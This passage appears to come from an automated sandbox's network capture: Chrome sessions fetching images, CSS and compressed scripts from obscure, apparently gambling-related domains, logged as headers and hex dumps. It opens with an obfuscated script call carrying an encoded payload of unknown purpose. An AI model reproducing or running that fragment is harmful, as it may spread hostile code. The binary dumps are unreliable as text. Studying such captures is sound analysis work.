                                                                                                                                                          2024-06-09 22:41:11 UTC2556INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 46 67 43 59 42 64 41 47 67 47 38 42 52 41 5a 68 6f 46 59 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 30 37 49 67 41 6c 42 51 43 2b 5a 41 4e 49 41 76 4e 41 42 73 57 37 4c 72 7a 54 39 42 5a 4b 43 49 42 45 72 4a 43 41 41 45 53 54 67 43 64 75 58 54 51 47 34 41 38 6d 41 42 57 49 4c 67 44 6f 41 4a 69 47 62 63 30 49 41 41 70 47 55 45 45 45 63 34 41 54 30 77 51 4d 6b 30 41 66 58 43 51 4a 41 42 5a 46 43 64 57 57 52 42 4e 53 67 41 33 4b 46 6c 57 45 45 59 41 51 67 41 47 55 53 46 7a 64 4b 4d 39 46 41 42 65 4b 45 78 4e 50 4a 67 49 5a 6b 30 68 4d 69 52 4b 36 72 7a 75 54 77 41 4c 52 72 4a 5a 53 6f 63 56 4a 43 62 75 56 73 30 41 65 6c 53 41 63 51 49
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgFgCYBdAGgG8BRAZhoFYAuAMwFc0YAXAS3U07IgAlBQC+ZANIAvNABsW7LrzT9BZKCIBErJCAAESTgCduXTQG4A8mABWILgDoAJiGbc0IAApGUEEEc4AT0wQMk0AfXCQJABZFCdWWRBNSgA3KFlWEEYAQgAGUSFzdKM9FABeKExNPJgIZk0hMiRK6rzuTwALRrJZSocVJCbuVs0AelSAcQI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          390192.168.2.55011538.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC437OUTGET /ftl/commonPage/images/partner/partner-hongtu-white.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: route=61ee84c9f68236309da705261df10e5a
                                                                                                                                                          2024-06-09 22:41:12 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:12 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:12 UTC24INData Raw: 45 54 61 67 3a 20 22 36 36 31 33 62 39 32 37 2d 31 32 33 36 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "6613b927-1236c"
                                                                                                                                                          2024-06-09 22:41:12 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:58 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:41:12 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 38 20 41 70 72 20 32 30 32 34 20 30 39 3a 33 30 3a 31 35 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Mon, 08 Apr 2024 09:30:15 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:12 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 38 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:58 GMT
                                                                                                                                                          2024-06-09 22:41:12 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:41:12 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          391192.168.2.550158183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC574OUTGET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC672INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 18660
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-YANC-MP-116-19
                                                                                                                                                          ETag: "6131d862-48e4"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Last-Modified: Fri, 03 Sep 2021 08:10:10 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:12 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;yancmp116:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-YANC-MP-116-19
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: 188a45a9d2dbee02a67d035ccabd644d
                                                                                                                                                          2024-06-09 22:41:12 UTC15712INData Raw: 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 69 6d 67 62 61 72 2c 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 69 6d 67 74 69 74 20 61 2c 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 74 61 62 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 74 69 74 6c 65 20 73 70 61 6e 2c 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 74 69 74 6c 65 20 7b 0a 20 20 20 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 0a 7d 0a 0a 68 74 6d 6c 20 23 6c 61 79 75 69 63 73 73 2d 6c 61 79 65 72 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 39 38 39 70 78 0a 7d 0a 0a 2e 6c 61 79 75
                                                                                                                                                          Data Ascii: .layui-layer-imgbar, .layui-layer-imgtit a, .layui-layer-tab .layui-layer-title span, .layui-layer-title { text-overflow: ellipsis; white-space: nowrap}html #layuicss-layer { display: none; position: absolute; width: 1989px}.layu
                                                                                                                                                          2024-06-09 22:41:12 UTC2948INData Raw: 61 79 65 72 2d 74 61 62 6d 61 69 6e 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 74 61 62 6c 69 2e 6c 61 79 75 69 2d 74 68 69 73 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0a 7d 0a 0a 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 70 68 6f 74 6f 73 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 38 73 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 38 73 0a 7d 0a 0a 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 70 68 6f 74 6f 73 20 2e 6c 61 79 75 69 2d 6c 61 79 65 72 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0a 7d 0a 0a 2e 6c 61 79 75 69 2d
                                                                                                                                                          Data Ascii: ayer-tabmain .layui-layer-tabli.layui-this { display: block}.layui-layer-photos { -webkit-animation-duration: .8s; animation-duration: .8s}.layui-layer-photos .layui-layer-content { overflow: hidden; text-align: center}.layui-


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          392192.168.2.550157183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC538OUTGET /ftl/commonPage/js/moment.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC708INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 26968
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-04-12
                                                                                                                                                          ETag: W/"64b633ca-1cab9"
                                                                                                                                                          Date: Thu, 06 Jun 2024 22:03:29 GMT
                                                                                                                                                          Last-Modified: Tue, 18 Jul 2023 06:40:10 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 22:03:29 GMT
                                                                                                                                                          Age: 261463
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-04-12
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-11
                                                                                                                                                          X-Cdn-Request-ID: c64f46c270ef6073213766a68b3c40a8
                                                                                                                                                          2024-06-09 22:41:12 UTC15676INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd fb 77 1b d7 75 28 fc bb ff 8a 91 9b 04 80 08 80 0f bd 6c ca 34 97 22 ea 95 8a 92 6b d2 57 b5 29 86 1d 02 43 62 2c 00 83 62 00 51 b4 a9 ac 3a 69 1b f7 75 ef ed 5a c9 6d da a4 69 92 3a 6d 1e 4d bf de b6 69 95 f8 5b e9 0f e9 ba 7f 87 bc dc a4 fd 6e dd ff e1 db af 73 e6 bc 66 00 d9 6e 9a d5 1a 71 44 60 66 bf ce 6b 9f 7d f6 d9 67 9f c5 c5 53 d1 20 1b 24 c3 49 fb d5 fc a9 45 f8 75 3f 19 e7 69 36 8c 56 a3 95 f6 f2 52 fb 0c 3d 8c a7 93 5e 36 ce e1 e1 76 3a 88 ee 64 59 b7 19 dd c8 ef 8d 93 61 74 b9 97 8c 87 c9 fd 66 b4 a9 c8 44 9d 6c 38 19 a7 fb d3 09 a0 10 7a 3f ed 24 c3 3c 01 f4 cd 1b db f4 84 79 be 9a b7 3b d9 e0 a9 a7 ea 07 d3 61 67 82 5c eb 87 fd 6c 3f ee 37 a3 83 b8 03 e8 c7 8d e8 f5 a7 22 f8 4c 8e 47 49 76 10 25 0f 46 d9
                                                                                                                                                          Data Ascii: wu(l4"kW)Cb,bQ:iuZmi:mMi[nsfnqD`fk}gS $IEu?i6VR=^6v:dYatfDl8z?$<y;ag\l?7"LGIv%F
                                                                                                                                                          2024-06-09 22:41:12 UTC11292INData Raw: d7 37 a7 e6 d4 37 ad c0 10 73 e2 38 1d a7 43 50 56 27 62 f1 89 ab b5 55 ee d9 08 d7 5e ae b4 fd 76 46 7b f6 a5 55 67 b6 5b 41 7f c9 2f c0 0c 2e 04 5a c1 87 5a a0 e8 1c 6e 9d cf c7 df 82 d6 4a ce bc 1f cc 64 37 53 15 13 19 a5 3f ea 81 3e 5a ad ed bc 65 40 d1 9e 15 15 c5 07 78 d4 54 1c ae 22 4c 22 51 5d 41 05 9c d7 81 8c be 2e f5 54 39 bb 3a 84 bd 09 56 68 f8 37 77 e0 67 66 c1 7b 71 7e a9 4f d7 01 e0 51 0c cb 00 71 8b 7e 2a 38 55 a8 81 b8 14 62 1f 18 30 0a be 7c 39 55 32 8a dc 32 d5 dd 21 07 13 86 48 88 5e b7 c8 4f 50 6f 3a 4f e3 63 28 75 6f b2 15 df 87 3a a4 c9 2d 94 e4 b5 6e 89 ee 31 e4 6d 6b 9d c7 8f ef 79 5d b2 4a 00 73 e6 fb a0 71 ce a2 a1 09 94 8c f2 50 71 b6 7a e9 01 1a d3 25 1d 38 0e ba 69 65 47 df 9e 23 64 8e 76 6e 7d d7 64 82 0b 63 f5 d6 1e 99 a6
                                                                                                                                                          Data Ascii: 77s8CPV'bU^vF{Ug[A/.ZZnJd7S?>Ze@xT"L"Q]A.T9:Vh7wgf{q~OQq~*8Ub0|9U22!H^OPo:Oc(uo:-n1mky]JsqPqz%8ieG#dvn}dc


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          393192.168.2.55016123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC373OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC620INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE14[13],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,10],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2366191
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dc772c6964d4a5e18caa8e5d8373810d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 225809
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC15764INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:12 UTC2114INData Raw: b7 99 e3 23 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8 de 98 d3 d5 ea 11 1a 30 1b 55 22 ae
                                                                                                                                                          Data Ascii: #:K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%0U"


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          394192.168.2.55016090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC389OUTGET /pc/image-pc/index/312/service/convenient_icon.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8202
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:57 GMT
                                                                                                                                                          ETag: "5d71fe89-200a"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE14[296],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,295],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465113
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 23f6df5f95d57ca53bf45260c773f467
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105844
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC8202INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 44 00 00 00 4f 08 06 00 00 00 52 d4 63 71 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 1f 21 49 44 41 54 78 da c5 7c 79 9c 5c 55 b5 ee b7 d6 de 67 a8 aa ae 1e 32 90 84 41 06 03 97 ab a8 c8 e0 13 9f 22 0a 02 32 07 02 09 12 03 02 22 38 f0 bc 88 03 de 7b 7d e8 bb 38 80 03 8a 3c 40 88 20 84 79 50 46 15 01 e5 89 97 cb 55 40 65 10 c2 4c 02 09 99 ba bb ba 86 33 ec bd d6 fb e3 54 55 77 92 a6 81 d0 d1 c5 6f 53 a7 fa 54 ce de fb 5b 6b af bd a6 7d 08 13 12 83 c1 00 00 01 00 72 c5 9f 0d 60 05 10 69 ff 9d 23 a0 5a 05 a2
                                                                                                                                                          Data Ascii: PNGIHDRDORcqgAMAa cHRMz&u0`:pQ<bKGD!IDATx|y\Ug2A"2"8{}8<@ yPFU@eL3TUwoST[k}r`i#Z


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          395192.168.2.55016323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC369OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC618INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE16[6],EU-FRA-paris-GLOBAL1-CACHE12[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2366191
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: cf28ccccf8a086c5bba67482cf17e902
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 225809
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          396192.168.2.55016290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:11 UTC388OUTGET /pc/image-pc/index/312/service/security_icon1.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
